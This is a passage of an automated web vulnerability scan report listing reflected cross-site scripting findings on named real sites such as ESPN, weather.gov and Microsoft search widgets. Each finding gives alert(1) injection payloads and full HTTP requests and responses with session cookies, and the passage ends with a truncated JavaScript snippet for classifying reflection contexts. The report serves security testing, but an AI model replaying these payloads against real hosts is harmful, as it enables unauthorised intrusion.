X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Ian O'Connor Archiv
...[SNIP]...
<a href="http://search.espn.go.com/ian-o-connorf0db4"><script>alert(1)</script>35d0e784658/">
...[SNIP]...

3.236. http://espn.go.com/videohub/mpf/config.prodXml [adminOver parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /videohub/mpf/config.prodXml

Issue detail

The value of the adminOver request parameter is copied into the XML document as plain text between tags. The payload ea180<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>6674f816b2 was submitted in the adminOver parameter. This input was echoed as ea180<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>6674f816b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /videohub/mpf/config.prodXml?player=index09&adminOver=3805638ea180<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>6674f816b2&xhr=1 HTTP/1.1
Host: espn.go.com
Proxy-Connection: keep-alive
Referer: http://espn.go.com/new-york/
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; userAB=F; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1298497363; broadbandAccess=espn3-false%2Cnetworks-false

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 21:43:51 GMT
Content-Type: text/xml;charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 21:43:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN34
Cache-Expires: Wed, 23 Feb 2011 21:52:11 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 6404


<mpf>


   <globalPlayerConfig adminOver="3805638ea180<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>6674f816b2">

       <freewheel>
           <debugMode>QUIET</debugMode>
           <networkID
...[SNIP]...

3.237. http://flash.quantserve.com/quant.swf [lc parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://flash.quantserve.com
Path:   /quant.swf

Issue detail

The value of the lc request parameter is copied into the HTML document as plain text between tags. The payload 37405<a%20b%3dc>7b26340890c was submitted in the lc parameter. This input was echoed as 37405<a b=c>7b26340890c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quant.swf?qcv=2%2E1%2E1&url=http%3A%2F%2Fstatic%2Eslidesharecdn%2Ecom%2Fswf%2Fssplayer2%2Eswf%3Fdoc%3D3%2Draylyle%2Dviglinkforumconppt%2D1%2D110218170233%2Dphpapp01%26stripped%5Ftitle%3D3%2Dray%2Dlyleviglink%2Dforumcon%2Dppt1%26userName%3DVigLink&pageURL=http%3A%2F%2Fblog%2Eviglink%2Ecom%2F&stripped%5Ftitle=3%2Dray%2Dlyleviglink%2Dforumcon%2Dppt1&doc=3%2Draylyle%2Dviglinkforumconppt%2D1%2D110218170233%2Dphpapp01&flashPlayer=WIN%2010%2C2%2C154%2C27&fpf=1%2D0%2D0&userName=VigLink&media=widget&server=http%3A%2F%2Fflash%2Equantserve%2Ecom&lc=%5F1303238625614%5F138037405<a%20b%3dc>7b26340890c&videoId=embed%5Fplayer%5Fas3&publisherId=p%2DabU44ONrAuwk2 HTTP/1.1
Host: flash.quantserve.com
Proxy-Connection: keep-alive
Referer: http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=3-raylyle-viglinkforumconppt-1-110218170233-phpapp01&stripped_title=3-ray-lyleviglink-forumcon-ppt1&userName=VigLink
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EEgBCQHGBpEA

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: application/x-shockwave-flash
Cache-Control: private, no-transform, max-age=86400
Expires: Wed, 20 Apr 2011 18:43:51 GMT
Date: Tue, 19 Apr 2011 18:43:51 GMT
Server: QS
Content-Length: 4698

FWS.Z...x.._.........D.....C....?.0....X.n.setTrace.dothetrace.allowTrace.read_so._depth.setUpLocal_lc.remote_lc.LocalConnection.LOCAL_LCNAME.rpcResult.REMOTE_LCNAME.send.local_lc.allowDomain.allowIns
...[SNIP]...
ject not saved..quant Shared object flushed to disk..quant Shared object could not be flushed to disk..write_so.idToSecs.-.indexOf.slice.parseInt.Math.floor.Date.getTime..join.1-0-0._1303238625614_138037405<a b=c>7b26340890c.nothetrace.3.0.0.this.logs.initialize....initialize....)..............I............................=..    ..........O..............=................@...................    .
.................R....setUpLoc
...[SNIP]...

3.238. http://forecast.weather.gov/product.php [highlight parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://forecast.weather.gov
Path:   /product.php

Issue detail

The value of the highlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b77c1"%20a%3db%20111d93b24a1 was submitted in the highlight parameter. This input was echoed as b77c1" a=b 111d93b24a1 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /product.php?site=NWS&issuedby=GYX&product=AFD&format=CI&version=1&glossary=1&highlight=offb77c1"%20a%3db%20111d93b24a1 HTTP/1.1
Host: forecast.weather.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Age: 8
Date: Sat, 26 Feb 2011 02:11:18 GMT
Content-Length: 23466
Content-Type: text/html; charset=UTF-8
Expires: Sat, 26 Feb 2011 02:26:18 GMT
Cache-Control: max-age=900
X-Pad: work around browser bug
Server: Apache
Via: 1.1 wwwcache-2 (NetCache NetApp/6.0.7), 1.0 c3.w3.woc (squid)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<a href="?site=NWS&issuedby=GYX&product=AFD&format=CI&version=2&glossary=1&highlight=offb77c1" a=b 111d93b24a1">
...[SNIP]...

3.239. http://games.espn.go.com/frontpage/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.espn.go.com
Path:   /frontpage/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e3539<script>alert(1)</script>45440a8342f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /frontpagee3539<script>alert(1)</script>45440a8342f/ HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 132
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/frontpagee3539<script>alert(1)</script>45440a8342f/</BODY></HTML>

3.240. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://i1.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string literal: the response is served as application/x-javascript and the echo appears inside the double-quoted "queryParams" value passed to the SearchBox constructor. The payload 2fdba<img%20src%3da%20onerror%3dalert(1)>5c1efd4d1b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2fdba<img src=a onerror=alert(1)>5c1efd4d1b5 in the application's response.

The < and > characters come back unencoded, but inside a JavaScript string literal this markup is data, not HTML, so the event handler does not fire when the script itself loads. Whether it executes depends on how the widget later uses queryParams (for example, writing it into the document without encoding), which this evidence does not show. Leaving the string literal itself would instead require an unencoded double quote, which this payload does not test.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=TechNet&loc=en-us&watermark=TechNet&focusOnInit=false&2fdba<img%20src%3da%20onerror%3dalert(1)>5c1efd4d1b5=1 HTTP/1.1
Host: i1.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/security/cc308589
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A=I&I=AxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w!!&M=1; omniID=1303134620609_e49b_0c9c_6cf1_45f64f5a5361; WT_FPC=id=173.193.214.243-2082981296.30145999:lv=1303123822031:ss=1303123822031; WT_NVR_RU=0=technet:1=:2=

Response

HTTP/1.1 200 OK
ntCoent-Length: 12915
Content-Type: application/x-javascript
ETag: a052e59c4d086e3c6c172276d3240c78
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB38
Content-Length: 12915
Cache-Control: public, max-age=43199
Expires: Tue, 19 Apr 2011 23:23:20 GMT
Date: Tue, 19 Apr 2011 11:23:21 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
archBox({"allowEmptySearch":false,"appId":"2","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&2fdba<img src=a onerror=alert(1)>5c1efd4d1b5=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Tec
...[SNIP]...

3.241. http://i2.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://i2.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string literal: the response is served as application/x-javascript and the echo appears inside the double-quoted "queryParams" value passed to the SearchBox constructor. The payload e5baa<img%20src%3da%20onerror%3dalert(1)>d5054e4a430 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5baa<img src=a onerror=alert(1)>d5054e4a430 in the application's response.

The < and > characters come back unencoded, but inside a JavaScript string literal this markup is data, not HTML, so the event handler does not fire when the script itself loads. Whether it executes depends on how the widget later uses queryParams (for example, writing it into the document without encoding), which this evidence does not show. Leaving the string literal itself would instead require an unencoded double quote, which this payload does not test.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=TechNet&loc=en-us&watermark=TechNet&focusOnInit=false&e5baa<img%20src%3da%20onerror%3dalert(1)>d5054e4a430=1 HTTP/1.1
Host: i2.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/security/cc308589
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A=I&I=AxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w!!&M=1; WT_NVR_RU=0=technet:1=:2=; omniID=1303134620609_e49b_0c9c_6cf1_45f64f5a5361; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-2082981296.30145999:lv=1303201439308:ss=1303201412112

Response

HTTP/1.1 200 OK
ntCoent-Length: 12915
Content-Type: application/x-javascript
ETag: 4d9f632865803e5dd9d411f4605adee2
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB32
Content-Length: 12915
Cache-Control: public, max-age=43200
Expires: Tue, 19 Apr 2011 23:23:50 GMT
Date: Tue, 19 Apr 2011 11:23:50 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
archBox({"allowEmptySearch":false,"appId":"2","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&e5baa<img src=a onerror=alert(1)>d5054e4a430=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Tec
...[SNIP]...

3.242. http://i3.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://i3.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string literal: the response is served as application/x-javascript and the echo appears inside the double-quoted "queryParams" value passed to the SearchBox constructor. The payload 9eecd<img%20src%3da%20onerror%3dalert(1)>10c59ec9522 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9eecd<img src=a onerror=alert(1)>10c59ec9522 in the application's response.

The < and > characters come back unencoded, but inside a JavaScript string literal this markup is data, not HTML, so the event handler does not fire when the script itself loads. Whether it executes depends on how the widget later uses queryParams (for example, writing it into the document without encoding), which this evidence does not show. Leaving the string literal itself would instead require an unencoded double quote, which this payload does not test.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=TechNet&loc=en-us&watermark=TechNet&focusOnInit=false&9eecd<img%20src%3da%20onerror%3dalert(1)>10c59ec9522=1 HTTP/1.1
Host: i3.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/cc512759.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A=I&I=AxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w!!&M=1; WT_NVR_RU=0=technet:1=:2=; ADS=SN=175A21EF; MUID=B506C07761D7465D924574124E3C14DF; MC1=GUID=845eef4a7ff18745a494666b76292718&HASH=4aef&LV=20114&V=3; WT_FPC=id=173.193.214.243-2082981296.30145999:lv=1303201470809:ss=1303201412112; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=23d3eadb-2e57-4cdb-babc-afe9807533a5&Microsoft.CreationDate=04/19/2011 11:23:33&Microsoft.LastVisitDate=04/19/2011 11:23:50&Microsoft.NumberOfVisits=3&SessionCookie.Id=C488C2B80EEAE31CD61220326F9B97E9; MSID=Microsoft.CreationDate=04/19/2011 11:23:33&Microsoft.LastVisitDate=04/19/2011 11:23:50&Microsoft.VisitStartDate=04/19/2011 11:23:33&Microsoft.CookieId=64491e77-08ce-4e1f-9bac-3648a81416de&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=3&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0253-8586-9443-3504; MS0=1a2d640efaf1443f825bb8c35bff2532; msdn=L=1033; omniID=1303134620609_e49b_0c9c_6cf1_45f64f5a5361; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
ntCoent-Length: 12915
Content-Type: application/x-javascript
ETag: 9b52ce8f17c99b63817c9bdbe6b8ad26
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB29
Content-Length: 12915
Cache-Control: public, max-age=43199
Expires: Tue, 19 Apr 2011 23:31:15 GMT
Date: Tue, 19 Apr 2011 11:31:16 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
archBox({"allowEmptySearch":false,"appId":"2","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&9eecd<img src=a onerror=alert(1)>10c59ec9522=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Tec
...[SNIP]...

3.243. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://i4.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string literal: the response is served as application/x-javascript and the echo appears inside the double-quoted "queryParams" value passed to the SearchBox constructor. The payload 5cfd3<img%20src%3da%20onerror%3dalert(1)>070328299a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5cfd3<img src=a onerror=alert(1)>070328299a1 in the application's response.

The < and > characters come back unencoded, but inside a JavaScript string literal this markup is data, not HTML, so the event handler does not fire when the script itself loads. Whether it executes depends on how the widget later uses queryParams (for example, writing it into the document without encoding), which this evidence does not show. Leaving the string literal itself would instead require an unencoded double quote, which this payload does not test.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=TechNet&loc=en-us&watermark=TechNet&focusOnInit=false&5cfd3<img%20src%3da%20onerror%3dalert(1)>070328299a1=1 HTTP/1.1
Host: i4.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A=I&I=AxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w!!&M=1; WT_NVR_RU=0=technet:1=:2=; WT_FPC=id=173.193.214.243-2082981296.30145999:lv=1303201439308:ss=1303201412112; ADS=SN=175A21EF; omniID=1303134620609_e49b_0c9c_6cf1_45f64f5a5361; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
ntCoent-Length: 12915
Content-Type: application/x-javascript
ETag: eb3b7cfed02a572aca16eae15803333c
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB32
Content-Length: 12915
Cache-Control: public, max-age=43200
Expires: Tue, 19 Apr 2011 23:23:51 GMT
Date: Tue, 19 Apr 2011 11:23:51 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
archBox({"allowEmptySearch":false,"appId":"2","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&5cfd3<img src=a onerror=alert(1)>070328299a1=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Tec
...[SNIP]...

3.244. http://ib.adnxs.com/ab [cnd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c463'-alert(1)-'ba5a810b394 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=zszMzMzM7D_NzMzMzMzsPwAAAMDMzOw_zczMzMzM7D_NzMzMzMzsP6-N1StXo8pzvNv2i6g_Cj5JfmVNAAAAADchAAC1AAAAagEAAAIAAAB0-AIA0WMAAAEAAABVU0QAVVNEACwB-gDNClQApQMBAgUCAAQAAAAAhS4AGgAAAAA.&tt_code=vert-63&udj=uf%28%27a%27%2C+10117%2C+1298497097%29%3Buf%28%27c%27%2C+49291%2C+1298497097%29%3Buf%28%27r%27%2C+194676%2C+1298497097%29%3Bppv%289239%2C+%278343660854450163119%27%2C+1298497097%2C+1299706697%2C+49291%2C+25553%29%3B&cnd=!Yxa9ZAiLgQMQ9PALGAAg0ccBKFQxAAAAwMzM7D9CEwgAEAAYACABKP7__________wFIAFAAWM0VYABo6gI.5c463'-alert(1)-'ba5a810b394&referrer=http://www.komonews.com/weather&pp=TWV-SQAH9ygK7F4kAKxMFELM_cWJgyGndva2MQ&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBBVmNSX5lTajuH6S8sQeUmLEF1PX12QHs56PgHNzOmvFCABABGAEgADgBUIDH4cQEYMmGo4fUo4AQggEXY2EtcHViLTI3MzM5OTQzMTU5NjI2MzOyARB3d3cua29tb25ld3MuY29tugEKMzAweDI1MF9hc8gBCdoBH2h0dHA6Ly93d3cua29tb25ld3MuY29tL3dlYXRoZXKYArQBwAIEyALE5swWqAMB6AM_6AO4KugDvAToA7kp9QMAAABE9QMgAAAA%26num%3D1%26sig%3DAGiWqtys2Mfisw0UXTlYtNy6D11F57DF6w%26client%3Dca-pub-2733994315962633%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIr7gCEAoYASABKAEwtPyV6wQQtPyV6wQYAA..; sess=1; uuid2=4470455573253905340; anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ!z6WIpbjn!e5'S.ASR/7l([H.cpVGe8tPtQ-y5#we@ie65CB#S!9Y^vP[KF^P'%_EYX5)gWYmv-[1%xvmrNHt.[<D(7u)aj^!iH1rT^=*7C^Bjc%C9:V]:>i#xK^@g2k_woCAWF@?sM.MP<1ix2hdXO=Pl'/PbHH*j^3)C6XZhUC$K!+.kQ]f9jkt)1ur:'MK@Nx4=0i7Jr<lXda`#HI#!f

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 24-Feb-2011 21:42:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Tue, 24-May-2011 21:42:44 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Tue, 24-May-2011 21:42:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6WIpbjn!e5'S.ASR/7l([H.cpVGe8tPtQ-y5#we@ie65CB#S!9Y^vP[KF^P'%_EYX5)gWYmv-[1%xvmrNHt.[<D(7u)aj^!iH1rT^=*7C^Bjc%C9:V]:>i#xK^@g2k_woCAWF@?sM.MP<1ic[d7oDDJ$2YVA<8r(ccEO=Pl'/PbFsX??`gC6X[1UC$K!+.kQaf9jkt):tzmY(.j84K]4XtqIGp!x$aQ6a4:5; path=/; expires=Tue, 24-May-2011 21:42:44 GMT; domain=.adnxs.com; HttpOnly
Date: Wed, 23 Feb 2011 21:42:44 GMT
Content-Length: 1516

document.write('<a href="http://ib.adnxs.com/click/CtejcD0Kxz8K16NwPQrHPwAAAMDMzOw_zczMzMzM7D_NzMzMzMzsP6-N1StXo8pzvNv2i6g_Cj5JfmVNAAAAADchAAC1AAAAagEAAAIAAAB0-AIA0WMAAAEAAABVU0QAVVNEACwB-gDNClQApQMBAgUCAAQAAAAAHilpjAAAAAA./cnd=!Yxa9ZAiLgQMQ9PALGAAg0ccBKFQxAAAAwMzM7D9CEwgAEAAYACABKP7__________wFIAFAAWM0VYABo6gI.5c463'-alert(1)-'ba5a810b394/referrer=http%3A%2F%2Fwww.komonews.com%2Fweather/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBBVmNSX5lTajuH6S8sQeUmLEF1PX12QHs56PgHNzOmvFCABABGAEgADgBUIDH4cQEYMmGo4fUo4AQg
...[SNIP]...
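The context labels the scanner attaches to its findings (an attribute value in double quotes in 3.238, plain text between tags in 3.239, a single-quoted JavaScript string in 3.244) come from locating the canary in the response and reading the syntax around it. The block below is an added example, not code from the XSS.CX report or from any site listed in it: it performs that classification on constructed response fragments modelled on the evidence lines of those three findings and checks whether the character needed to leave each context (the enclosing quote, or < for text) came back unencoded. The canary prefixes and suffixes are the ones the report shows; the shortened bodies, the &quot; negative case and the list of JavaScript content types are assumptions.

```javascript
// Added example: not code from the XSS.CX report or from any site listed in it.
// Locate a scanner canary in a response body, classify the syntactic context
// it landed in, and check whether the breakout character survived unencoded.

// Content-Types treated as "the whole body is JavaScript" (assumption).
const JS_TYPES = ['text/javascript', 'application/x-javascript', 'application/javascript'];

// JavaScript string-literal state at the end of a code fragment.
// Heuristic: comments, regex and template literals are not modelled.
function jsStringState(code) {
  let quote = null;
  for (let i = 0; i < code.length; i++) {
    const c = code[i];
    if (quote) {
      if (c === '\\') i++;               // skip the escaped character
      else if (c === quote) quote = null;
    } else if (c === '"' || c === "'") {
      quote = c;
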